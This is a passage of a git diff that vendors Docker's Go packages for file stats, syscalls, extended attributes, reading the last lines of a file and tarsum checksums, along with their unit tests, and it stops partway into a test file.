diff --git a/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go b/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go
new file mode 100644
index 0000000000..3c3b71fb21
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go
@@ -0,0 +1,15 @@
+package system
+
+import (
+	"syscall"
+)
+
+// fromStatT creates a system.StatT type from a syscall.Stat_t type
+func fromStatT(s *syscall.Stat_t) (*StatT, error) {
+	return &StatT{size: s.Size,
+		mode: uint32(s.Mode),
+		uid:  s.Uid,
+		gid:  s.Gid,
+		rdev: uint64(s.Rdev),
+		mtim: s.Mtim}, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_solaris.go b/vendor/github.com/docker/docker/pkg/system/stat_solaris.go
new file mode 100644
index 0000000000..0216985a25
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/stat_solaris.go
@@ -0,0 +1,34 @@
+// +build solaris
+
+package system
+
+import (
+	"syscall"
+)
+
+// fromStatT creates a system.StatT type from a syscall.Stat_t type
+func fromStatT(s *syscall.Stat_t) (*StatT, error) {
+	return &StatT{size: s.Size,
+		mode: uint32(s.Mode),
+		uid:  s.Uid,
+		gid:  s.Gid,
+		rdev: uint64(s.Rdev),
+		mtim: s.Mtim}, nil
+}
+
+// FromStatT loads a system.StatT from a syscal.Stat_t.
+func FromStatT(s *syscall.Stat_t) (*StatT, error) {
+	return fromStatT(s)
+}
+
+// Stat takes a path to a file and returns
+// a system.StatT type pertaining to that file.
+//
+// Throws an error if the file does not exist
+func Stat(path string) (*StatT, error) {
+	s := &syscall.Stat_t{}
+	if err := syscall.Stat(path, s); err != nil {
+		return nil, err
+	}
+	return fromStatT(s)
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go b/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go
new file mode 100644
index 0000000000..dee8d30a19
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go
@@ -0,0 +1,39 @@
+// +build linux freebsd
+
+package system
+
+import (
+	"os"
+	"syscall"
+	"testing"
+)
+
+// TestFromStatT tests fromStatT for a tempfile
+func TestFromStatT(t *testing.T) {
+	file, _, _, dir := prepareFiles(t)
+	defer os.RemoveAll(dir)
+
+	stat := &syscall.Stat_t{}
+	err := syscall.Lstat(file, stat)
+
+	s, err := fromStatT(stat)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if stat.Mode != s.Mode() {
+		t.Fatal("got invalid mode")
+	}
+	if stat.Uid != s.UID() {
+		t.Fatal("got invalid uid")
+	}
+	if stat.Gid != s.GID() {
+		t.Fatal("got invalid gid")
+	}
+	if stat.Rdev != s.Rdev() {
+		t.Fatal("got invalid rdev")
+	}
+	if stat.Mtim != s.Mtim() {
+		t.Fatal("got invalid mtim")
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go b/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go
new file mode 100644
index 0000000000..5d85f523cf
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go
@@ -0,0 +1,17 @@
+// +build !linux,!windows,!freebsd,!solaris,!openbsd,!darwin
+
+package system
+
+import (
+	"syscall"
+)
+
+// fromStatT creates a system.StatT type from a syscall.Stat_t type
+func fromStatT(s *syscall.Stat_t) (*StatT, error) {
+	return &StatT{size: s.Size,
+		mode: uint32(s.Mode),
+		uid:  s.Uid,
+		gid:  s.Gid,
+		rdev: uint64(s.Rdev),
+		mtim: s.Mtimespec}, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_windows.go b/vendor/github.com/docker/docker/pkg/system/stat_windows.go
new file mode 100644
index 0000000000..39490c625c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/stat_windows.go
@@ -0,0 +1,43 @@
+// +build windows
+
+package system
+
+import (
+	"os"
+	"time"
+)
+
+// StatT type contains status of a file. It contains metadata
+// like name, permission, size, etc about a file.
+type StatT struct {
+	name    string
+	size    int64
+	mode    os.FileMode
+	modTime time.Time
+	isDir   bool
+}
+
+// Name returns file's name.
+func (s StatT) Name() string {
+	return s.name
+}
+
+// Size returns file's size.
+func (s StatT) Size() int64 {
+	return s.size
+}
+
+// Mode returns file's permission mode.
+func (s StatT) Mode() os.FileMode {
+	return s.mode
+}
+
+// ModTime returns file's last modification time.
+func (s StatT) ModTime() time.Time {
+	return s.modTime
+}
+
+// IsDir returns whether file is actually a directory.
+func (s StatT) IsDir() bool {
+	return s.isDir
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_unix.go b/vendor/github.com/docker/docker/pkg/system/syscall_unix.go
new file mode 100644
index 0000000000..3ae9128468
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/syscall_unix.go
@@ -0,0 +1,17 @@
+// +build linux freebsd
+
+package system
+
+import "syscall"
+
+// Unmount is a platform-specific helper function to call
+// the unmount syscall.
+func Unmount(dest string) error {
+	return syscall.Unmount(dest, 0)
+}
+
+// CommandLineToArgv should not be used on Unix.
+// It simply returns commandLine in the only element in the returned array.
+func CommandLineToArgv(commandLine string) ([]string, error) {
+	return []string{commandLine}, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_windows.go b/vendor/github.com/docker/docker/pkg/system/syscall_windows.go
new file mode 100644
index 0000000000..1f311874f4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/syscall_windows.go
@@ -0,0 +1,105 @@
+package system
+
+import (
+	"syscall"
+	"unsafe"
+
+	"github.com/Sirupsen/logrus"
+)
+
+var (
+	ntuserApiset      = syscall.NewLazyDLL("ext-ms-win-ntuser-window-l1-1-0")
+	procGetVersionExW = modkernel32.NewProc("GetVersionExW")
+)
+
+// OSVersion is a wrapper for Windows version information
+// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724439(v=vs.85).aspx
+type OSVersion struct {
+	Version      uint32
+	MajorVersion uint8
+	MinorVersion uint8
+	Build        uint16
+}
+
+// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724833(v=vs.85).aspx
+type osVersionInfoEx struct {
+	OSVersionInfoSize uint32
+	MajorVersion      uint32
+	MinorVersion      uint32
+	BuildNumber       uint32
+	PlatformID        uint32
+	CSDVersion        [128]uint16
+	ServicePackMajor  uint16
+	ServicePackMinor  uint16
+	SuiteMask         uint16
+	ProductType       byte
+	Reserve           byte
+}
+
+// GetOSVersion gets the operating system version on Windows. Note that
+// docker.exe must be manifested to get the correct version information.
+func GetOSVersion() OSVersion {
+	var err error
+	osv := OSVersion{}
+	osv.Version, err = syscall.GetVersion()
+	if err != nil {
+		// GetVersion never fails.
+		panic(err)
+	}
+	osv.MajorVersion = uint8(osv.Version & 0xFF)
+	osv.MinorVersion = uint8(osv.Version >> 8 & 0xFF)
+	osv.Build = uint16(osv.Version >> 16)
+	return osv
+}
+
+// IsWindowsClient returns true if the SKU is client
+// @engine maintainers - this function should not be removed or modified as it
+// is used to enforce licensing restrictions on Windows.
+func IsWindowsClient() bool {
+	osviex := &osVersionInfoEx{OSVersionInfoSize: 284}
+	r1, _, err := procGetVersionExW.Call(uintptr(unsafe.Pointer(osviex)))
+	if r1 == 0 {
+		logrus.Warnf("GetVersionExW failed - assuming server SKU: %v", err)
+		return false
+	}
+	const verNTWorkstation = 0x00000001
+	return osviex.ProductType == verNTWorkstation
+}
+
+// Unmount is a platform-specific helper function to call
+// the unmount syscall. Not supported on Windows
+func Unmount(dest string) error {
+	return nil
+}
+
+// CommandLineToArgv wraps the Windows syscall to turn a commandline into an argument array.
+func CommandLineToArgv(commandLine string) ([]string, error) {
+	var argc int32
+
+	argsPtr, err := syscall.UTF16PtrFromString(commandLine)
+	if err != nil {
+		return nil, err
+	}
+
+	argv, err := syscall.CommandLineToArgv(argsPtr, &argc)
+	if err != nil {
+		return nil, err
+	}
+	defer syscall.LocalFree(syscall.Handle(uintptr(unsafe.Pointer(argv))))
+
+	newArgs := make([]string, argc)
+	for i, v := range (*argv)[:argc] {
+		newArgs[i] = string(syscall.UTF16ToString((*v)[:]))
+	}
+
+	return newArgs, nil
+}
+
+// HasWin32KSupport determines whether containers that depend on win32k can
+// run on this machine. Win32k is the driver used to implement windowing.
+func HasWin32KSupport() bool {
+	// For now, check for ntuser API support on the host. In the future, a host
+	// may support win32k in containers even if the host does not support ntuser
+	// APIs.
+	return ntuserApiset.Load() == nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go b/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go
new file mode 100644
index 0000000000..4886b2b9b4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go
@@ -0,0 +1,9 @@
+package system
+
+import "testing"
+
+func TestHasWin32KSupport(t *testing.T) {
+	s := HasWin32KSupport() // make sure this doesn't panic
+
+	t.Logf("win32k: %v", s) // will be different on different platforms -- informative only
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/umask.go b/vendor/github.com/docker/docker/pkg/system/umask.go
new file mode 100644
index 0000000000..3d0146b01a
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/umask.go
@@ -0,0 +1,13 @@
+// +build !windows
+
+package system
+
+import (
+	"syscall"
+)
+
+// Umask sets current process's file mode creation mask to newmask
+// and returns oldmask.
+func Umask(newmask int) (oldmask int, err error) {
+	return syscall.Umask(newmask), nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/umask_windows.go b/vendor/github.com/docker/docker/pkg/system/umask_windows.go
new file mode 100644
index 0000000000..13f1de1769
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/umask_windows.go
@@ -0,0 +1,9 @@
+// +build windows
+
+package system
+
+// Umask is not supported on the windows platform.
+func Umask(newmask int) (oldmask int, err error) {
+	// should not be called on cli code path
+	return 0, ErrNotSupportedPlatform
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go b/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go
new file mode 100644
index 0000000000..e2eac3b553
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go
@@ -0,0 +1,22 @@
+package system
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+// LUtimesNano is used to change access and modification time of the specified path.
+// It's used for symbol link file because syscall.UtimesNano doesn't support a NOFOLLOW flag atm.
+func LUtimesNano(path string, ts []syscall.Timespec) error {
+	var _path *byte
+	_path, err := syscall.BytePtrFromString(path)
+	if err != nil {
+		return err
+	}
+
+	if _, _, err := syscall.Syscall(syscall.SYS_LUTIMES, uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), 0); err != 0 && err != syscall.ENOSYS {
+		return err
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_linux.go b/vendor/github.com/docker/docker/pkg/system/utimes_linux.go
new file mode 100644
index 0000000000..fc8a1aba95
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/utimes_linux.go
@@ -0,0 +1,26 @@
+package system
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+// LUtimesNano is used to change access and modification time of the specified path.
+// It's used for symbol link file because syscall.UtimesNano doesn't support a NOFOLLOW flag atm.
+func LUtimesNano(path string, ts []syscall.Timespec) error {
+	// These are not currently available in syscall
+	atFdCwd := -100
+	atSymLinkNoFollow := 0x100
+
+	var _path *byte
+	_path, err := syscall.BytePtrFromString(path)
+	if err != nil {
+		return err
+	}
+
+	if _, _, err := syscall.Syscall6(syscall.SYS_UTIMENSAT, uintptr(atFdCwd), uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), uintptr(atSymLinkNoFollow), 0, 0); err != 0 && err != syscall.ENOSYS {
+		return err
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go b/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go
new file mode 100644
index 0000000000..a73ed118c9
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go
@@ -0,0 +1,68 @@
+// +build linux freebsd
+
+package system
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"syscall"
+	"testing"
+)
+
+// prepareFiles creates files for testing in the temp directory
+func prepareFiles(t *testing.T) (string, string, string, string) {
+	dir, err := ioutil.TempDir("", "docker-system-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	file := filepath.Join(dir, "exist")
+	if err := ioutil.WriteFile(file, []byte("hello"), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	invalid := filepath.Join(dir, "doesnt-exist")
+
+	symlink := filepath.Join(dir, "symlink")
+	if err := os.Symlink(file, symlink); err != nil {
+		t.Fatal(err)
+	}
+
+	return file, invalid, symlink, dir
+}
+
+func TestLUtimesNano(t *testing.T) {
+	file, invalid, symlink, dir := prepareFiles(t)
+	defer os.RemoveAll(dir)
+
+	before, err := os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	ts := []syscall.Timespec{{Sec: 0, Nsec: 0}, {Sec: 0, Nsec: 0}}
+	if err := LUtimesNano(symlink, ts); err != nil {
+		t.Fatal(err)
+	}
+
+	symlinkInfo, err := os.Lstat(symlink)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if before.ModTime().Unix() == symlinkInfo.ModTime().Unix() {
+		t.Fatal("The modification time of the symlink should be different")
+	}
+
+	fileInfo, err := os.Stat(file)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if before.ModTime().Unix() != fileInfo.ModTime().Unix() {
+		t.Fatal("The modification time of the file should be same")
+	}
+
+	if err := LUtimesNano(invalid, ts); err == nil {
+		t.Fatal("Doesn't return an error on a non-existing file")
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go b/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go
new file mode 100644
index 0000000000..139714544d
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go
@@ -0,0 +1,10 @@
+// +build !linux,!freebsd
+
+package system
+
+import "syscall"
+
+// LUtimesNano is only supported on linux and freebsd.
+func LUtimesNano(path string, ts []syscall.Timespec) error {
+	return ErrNotSupportedPlatform
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go b/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go
new file mode 100644
index 0000000000..d2e2c05799
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go
@@ -0,0 +1,63 @@
+package system
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+// Lgetxattr retrieves the value of the extended attribute identified by attr
+// and associated with the given path in the file system.
+// It will returns a nil slice and nil error if the xattr is not set.
+func Lgetxattr(path string, attr string) ([]byte, error) {
+	pathBytes, err := syscall.BytePtrFromString(path)
+	if err != nil {
+		return nil, err
+	}
+	attrBytes, err := syscall.BytePtrFromString(attr)
+	if err != nil {
+		return nil, err
+	}
+
+	dest := make([]byte, 128)
+	destBytes := unsafe.Pointer(&dest[0])
+	sz, _, errno := syscall.Syscall6(syscall.SYS_LGETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(destBytes), uintptr(len(dest)), 0, 0)
+	if errno == syscall.ENODATA {
+		return nil, nil
+	}
+	if errno == syscall.ERANGE {
+		dest = make([]byte, sz)
+		destBytes := unsafe.Pointer(&dest[0])
+		sz, _, errno = syscall.Syscall6(syscall.SYS_LGETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(destBytes), uintptr(len(dest)), 0, 0)
+	}
+	if errno != 0 {
+		return nil, errno
+	}
+
+	return dest[:sz], nil
+}
+
+var _zero uintptr
+
+// Lsetxattr sets the value of the extended attribute identified by attr
+// and associated with the given path in the file system.
+func Lsetxattr(path string, attr string, data []byte, flags int) error {
+	pathBytes, err := syscall.BytePtrFromString(path)
+	if err != nil {
+		return err
+	}
+	attrBytes, err := syscall.BytePtrFromString(attr)
+	if err != nil {
+		return err
+	}
+	var dataBytes unsafe.Pointer
+	if len(data) > 0 {
+		dataBytes = unsafe.Pointer(&data[0])
+	} else {
+		dataBytes = unsafe.Pointer(&_zero)
+	}
+	_, _, errno := syscall.Syscall6(syscall.SYS_LSETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(dataBytes), uintptr(len(data)), uintptr(flags), 0)
+	if errno != 0 {
+		return errno
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go b/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go
new file mode 100644
index 0000000000..0114f2227c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go
@@ -0,0 +1,13 @@
+// +build !linux
+
+package system
+
+// Lgetxattr is not supported on platforms other than linux.
+func Lgetxattr(path string, attr string) ([]byte, error) {
+	return nil, ErrNotSupportedPlatform
+}
+
+// Lsetxattr is not supported on platforms other than linux.
+func Lsetxattr(path string, attr string, data []byte, flags int) error {
+	return ErrNotSupportedPlatform
+}
diff --git a/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go b/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go
new file mode 100644
index 0000000000..09eb393ab7
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go
@@ -0,0 +1,66 @@
+// Package tailfile provides helper functions to read the nth lines of any
+// ReadSeeker.
+package tailfile
+
+import (
+	"bytes"
+	"errors"
+	"io"
+	"os"
+)
+
+const blockSize = 1024
+
+var eol = []byte("\n")
+
+// ErrNonPositiveLinesNumber is an error returned if the lines number was negative.
+var ErrNonPositiveLinesNumber = errors.New("The number of lines to extract from the file must be positive")
+
+//TailFile returns last n lines of reader f (could be a fil).
+func TailFile(f io.ReadSeeker, n int) ([][]byte, error) {
+	if n <= 0 {
+		return nil, ErrNonPositiveLinesNumber
+	}
+	size, err := f.Seek(0, os.SEEK_END)
+	if err != nil {
+		return nil, err
+	}
+	block := -1
+	var data []byte
+	var cnt int
+	for {
+		var b []byte
+		step := int64(block * blockSize)
+		left := size + step // how many bytes to beginning
+		if left < 0 {
+			if _, err := f.Seek(0, os.SEEK_SET); err != nil {
+				return nil, err
+			}
+			b = make([]byte, blockSize+left)
+			if _, err := f.Read(b); err != nil {
+				return nil, err
+			}
+			data = append(b, data...)
+			break
+		} else {
+			b = make([]byte, blockSize)
+			if _, err := f.Seek(left, os.SEEK_SET); err != nil {
+				return nil, err
+			}
+			if _, err := f.Read(b); err != nil {
+				return nil, err
+			}
+			data = append(b, data...)
+		}
+		cnt += bytes.Count(b, eol)
+		if cnt > n {
+			break
+		}
+		block--
+	}
+	lines := bytes.Split(data, eol)
+	if n < len(lines) {
+		return lines[len(lines)-n-1 : len(lines)-1], nil
+	}
+	return lines[:len(lines)-1], nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go b/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go
new file mode 100644
index 0000000000..31217c036c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go
@@ -0,0 +1,148 @@
+package tailfile
+
+import (
+	"io/ioutil"
+	"os"
+	"testing"
+)
+
+func TestTailFile(t *testing.T) {
+	f, err := ioutil.TempFile("", "tail-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer f.Close()
+	defer os.RemoveAll(f.Name())
+	testFile := []byte(`first line
+second line
+third line
+fourth line
+fifth line
+next first line
+next second line
+next third line
+next fourth line
+next fifth line
+last first line
+next first line
+next second line
+next third line
+next fourth line
+next fifth line
+next first line
+next second line
+next third line
+next fourth line
+next fifth line
+last second line
+last third line
+last fourth line
+last fifth line
+truncated line`)
+	if _, err := f.Write(testFile); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := f.Seek(0, os.SEEK_SET); err != nil {
+		t.Fatal(err)
+	}
+	expected := []string{"last fourth line", "last fifth line"}
+	res, err := TailFile(f, 2)
+	if err != nil {
+		t.Fatal(err)
+	}
+	for i, l := range res {
+		t.Logf("%s", l)
+		if expected[i] != string(l) {
+			t.Fatalf("Expected line %s, got %s", expected[i], l)
+		}
+	}
+}
+
+func TestTailFileManyLines(t *testing.T) {
+	f, err := ioutil.TempFile("", "tail-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer f.Close()
+	defer os.RemoveAll(f.Name())
+	testFile := []byte(`first line
+second line
+truncated line`)
+	if _, err := f.Write(testFile); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := f.Seek(0, os.SEEK_SET); err != nil {
+		t.Fatal(err)
+	}
+	expected := []string{"first line", "second line"}
+	res, err := TailFile(f, 10000)
+	if err != nil {
+		t.Fatal(err)
+	}
+	for i, l := range res {
+		t.Logf("%s", l)
+		if expected[i] != string(l) {
+			t.Fatalf("Expected line %s, got %s", expected[i], l)
+		}
+	}
+}
+
+func TestTailEmptyFile(t *testing.T) {
+	f, err := ioutil.TempFile("", "tail-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer f.Close()
+	defer os.RemoveAll(f.Name())
+	res, err := TailFile(f, 10000)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(res) != 0 {
+		t.Fatal("Must be empty slice from empty file")
+	}
+}
+
+func TestTailNegativeN(t *testing.T) {
+	f, err := ioutil.TempFile("", "tail-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer f.Close()
+	defer os.RemoveAll(f.Name())
+	testFile := []byte(`first line
+second line
+truncated line`)
+	if _, err := f.Write(testFile); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := f.Seek(0, os.SEEK_SET); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := TailFile(f, -1); err != ErrNonPositiveLinesNumber {
+		t.Fatalf("Expected ErrNonPositiveLinesNumber, got %s", err)
+	}
+	if _, err := TailFile(f, 0); err != ErrNonPositiveLinesNumber {
+		t.Fatalf("Expected ErrNonPositiveLinesNumber, got %s", err)
+	}
+}
+
+func BenchmarkTail(b *testing.B) {
+	f, err := ioutil.TempFile("", "tail-test")
+	if err != nil {
+		b.Fatal(err)
+	}
+	defer f.Close()
+	defer os.RemoveAll(f.Name())
+	for i := 0; i < 10000; i++ {
+		if _, err := f.Write([]byte("tailfile pretty interesting line\n")); err != nil {
+			b.Fatal(err)
+		}
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		if _, err := TailFile(f, 1000); err != nil {
+			b.Fatal(err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go b/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go
new file mode 100644
index 0000000000..b42983e984
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go
@@ -0,0 +1,21 @@
+package tarsum
+
+// BuilderContext is an interface extending TarSum by adding the Remove method.
+// In general there was concern about adding this method to TarSum itself
+// so instead it is being added just to "BuilderContext" which will then
+// only be used during the .dockerignore file processing
+// - see builder/evaluator.go
+type BuilderContext interface {
+	TarSum
+	Remove(string)
+}
+
+func (bc *tarSum) Remove(filename string) {
+	for i, fis := range bc.sums {
+		if fis.Name() == filename {
+			bc.sums = append(bc.sums[:i], bc.sums[i+1:]...)
+			// Note, we don't just return because there could be
+			// more than one with this name
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go b/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go
new file mode 100644
index 0000000000..f54bf3a1bd
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go
@@ -0,0 +1,67 @@
+package tarsum
+
+import (
+	"io"
+	"io/ioutil"
+	"os"
+	"testing"
+)
+
+// Try to remove tarsum (in the BuilderContext) that do not exists, won't change a thing
+func TestTarSumRemoveNonExistent(t *testing.T) {
+	filename := "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar"
+	reader, err := os.Open(filename)
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer reader.Close()
+
+	ts, err := NewTarSum(reader, false, Version0)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// Read and discard bytes so that it populates sums
+	_, err = io.Copy(ioutil.Discard, ts)
+	if err != nil {
+		t.Errorf("failed to read from %s: %s", filename, err)
+	}
+
+	expected := len(ts.GetSums())
+
+	ts.(BuilderContext).Remove("")
+	ts.(BuilderContext).Remove("Anything")
+
+	if len(ts.GetSums()) != expected {
+		t.Fatalf("Expected %v sums, go %v.", expected, ts.GetSums())
+	}
+}
+
+// Remove a tarsum (in the BuilderContext)
+func TestTarSumRemove(t *testing.T) {
+	filename := "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar"
+	reader, err := os.Open(filename)
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer reader.Close()
+
+	ts, err := NewTarSum(reader, false, Version0)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// Read and discard bytes so that it populates sums
+	_, err = io.Copy(ioutil.Discard, ts)
+	if err != nil {
+		t.Errorf("failed to read from %s: %s", filename, err)
+	}
+
+	expected := len(ts.GetSums()) - 1
+
+	ts.(BuilderContext).Remove("etc/sudoers")
+
+	if len(ts.GetSums()) != expected {
+		t.Fatalf("Expected %v sums, go %v.", expected, len(ts.GetSums()))
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go
new file mode 100644
index 0000000000..5abf5e7ba3
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go
@@ -0,0 +1,126 @@
+package tarsum
+
+import "sort"
+
+// FileInfoSumInterface provides an interface for accessing file checksum
+// information within a tar file. This info is accessed through interface
+// so the actual name and sum cannot be melded with.
+type FileInfoSumInterface interface {
+	// File name
+	Name() string
+	// Checksum of this particular file and its headers
+	Sum() string
+	// Position of file in the tar
+	Pos() int64
+}
+
+type fileInfoSum struct {
+	name string
+	sum  string
+	pos  int64
+}
+
+func (fis fileInfoSum) Name() string {
+	return fis.name
+}
+func (fis fileInfoSum) Sum() string {
+	return fis.sum
+}
+func (fis fileInfoSum) Pos() int64 {
+	return fis.pos
+}
+
+// FileInfoSums provides a list of FileInfoSumInterfaces.
+type FileInfoSums []FileInfoSumInterface
+
+// GetFile returns the first FileInfoSumInterface with a matching name.
+func (fis FileInfoSums) GetFile(name string) FileInfoSumInterface {
+	for i := range fis {
+		if fis[i].Name() == name {
+			return fis[i]
+		}
+	}
+	return nil
+}
+
+// GetAllFile returns a FileInfoSums with all matching names.
+func (fis FileInfoSums) GetAllFile(name string) FileInfoSums {
+	f := FileInfoSums{}
+	for i := range fis {
+		if fis[i].Name() == name {
+			f = append(f, fis[i])
+		}
+	}
+	return f
+}
+
+// GetDuplicatePaths returns a FileInfoSums with all duplicated paths.
+func (fis FileInfoSums) GetDuplicatePaths() (dups FileInfoSums) {
+	seen := make(map[string]int, len(fis)) // allocate earl. no need to grow this map.
+	for i := range fis {
+		f := fis[i]
+		if _, ok := seen[f.Name()]; ok {
+			dups = append(dups, f)
+		} else {
+			seen[f.Name()] = 0
+		}
+	}
+	return dups
+}
+
+// Len returns the size of the FileInfoSums.
+func (fis FileInfoSums) Len() int { return len(fis) }
+
+// Swap swaps two FileInfoSum values if a FileInfoSums list.
+func (fis FileInfoSums) Swap(i, j int) { fis[i], fis[j] = fis[j], fis[i] }
+
+// SortByPos sorts FileInfoSums content by position.
+func (fis FileInfoSums) SortByPos() {
+	sort.Sort(byPos{fis})
+}
+
+// SortByNames sorts FileInfoSums content by name.
+func (fis FileInfoSums) SortByNames() {
+	sort.Sort(byName{fis})
+}
+
+// SortBySums sorts FileInfoSums content by sums.
+func (fis FileInfoSums) SortBySums() {
+	dups := fis.GetDuplicatePaths()
+	if len(dups) > 0 {
+		sort.Sort(bySum{fis, dups})
+	} else {
+		sort.Sort(bySum{fis, nil})
+	}
+}
+
+// byName is a sort.Sort helper for sorting by file names.
+// If names are the same, order them by their appearance in the tar archive
+type byName struct{ FileInfoSums }
+
+func (bn byName) Less(i, j int) bool {
+	if bn.FileInfoSums[i].Name() == bn.FileInfoSums[j].Name() {
+		return bn.FileInfoSums[i].Pos() < bn.FileInfoSums[j].Pos()
+	}
+	return bn.FileInfoSums[i].Name() < bn.FileInfoSums[j].Name()
+}
+
+// bySum is a sort.Sort helper for sorting by the sums of all the fileinfos in the tar archive
+type bySum struct {
+	FileInfoSums
+	dups FileInfoSums
+}
+
+func (bs bySum) Less(i, j int) bool {
+	if bs.dups != nil && bs.FileInfoSums[i].Name() == bs.FileInfoSums[j].Name() {
+		return bs.FileInfoSums[i].Pos() < bs.FileInfoSums[j].Pos()
+	}
+	return bs.FileInfoSums[i].Sum() < bs.FileInfoSums[j].Sum()
+}
+
+// byPos is a sort.Sort helper for sorting by the sums of all the fileinfos by their original order
+type byPos struct{ FileInfoSums }
+
+func (bp byPos) Less(i, j int) bool {
+	return bp.FileInfoSums[i].Pos() < bp.FileInfoSums[j].Pos()
+}
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go
new file mode 100644
index 0000000000..bb700d8bde
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go
@@ -0,0 +1,62 @@
+package tarsum
+
+import "testing"
+
+func newFileInfoSums() FileInfoSums {
+	return FileInfoSums{
